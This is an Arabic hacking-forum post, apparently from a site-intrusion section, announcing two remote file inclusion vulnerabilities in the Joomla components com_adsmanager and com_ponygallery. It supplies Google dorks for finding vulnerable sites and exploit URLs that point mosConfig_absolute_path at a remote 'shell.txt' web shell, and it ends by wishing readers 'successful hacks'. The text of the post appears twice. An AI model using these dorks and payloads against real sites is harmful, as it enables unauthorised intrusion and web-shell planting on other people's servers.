ثغرات جديدة في سكربت Joomla
السلام عليكم ورحمة الله تعالى و بركاته
ظهرت ثغرتان جديدتان في سكريبت joomla
الثغرة الاولى Joomla Component com_adsmanager Remote File Include
تاريخ اكتشاف الثغرة 23/12/2010
مكتشف الثغرة : AtT4CKxT3rR0r1ST
تحميل السكربت : http://downloads.ziddu.com/downloadfiles/10982893/com_adsmanager.zip
و الآن الشيء المهم
الدورك :
الاستغلال :
حيث site.com هو الموقع
و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities
تاريخ اكتشاف الثغرة 23/12/2010
مكتشف الثغرة AtT4CKxT3rR0r1ST
الدورك
الاستغلال
او
حيث site.com هو الموقع
و [?shell.txt] هو رابط الشل بصيغة txt
شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة
اختراقات موفقة
ظهرت ثغرتان جديدتان في سكريبت joomla
الثغرة الاولى Joomla Component com_adsmanager Remote File Include
تاريخ اكتشاف الثغرة 23/12/2010
مكتشف الثغرة : AtT4CKxT3rR0r1ST
تحميل السكربت : http://downloads.ziddu.com/downloadfiles/10982893/com_adsmanager.zip
و الآن الشيء المهم
الدورك :
PHP:
inurl:"com_adsmanager"الاستغلال :
PHP:
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]حيث site.com هو الموقع
و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities
تاريخ اكتشاف الثغرة 23/12/2010
مكتشف الثغرة AtT4CKxT3rR0r1ST
الدورك
PHP:
inurl:"com_ponygallery"
PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?]او
PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]حيث site.com هو الموقع
و [?shell.txt] هو رابط الشل بصيغة txt
شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة
اختراقات موفقة
التعديل الأخير:
اسم الموضوع : ثغرات جديدة في سكربت Joomla
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات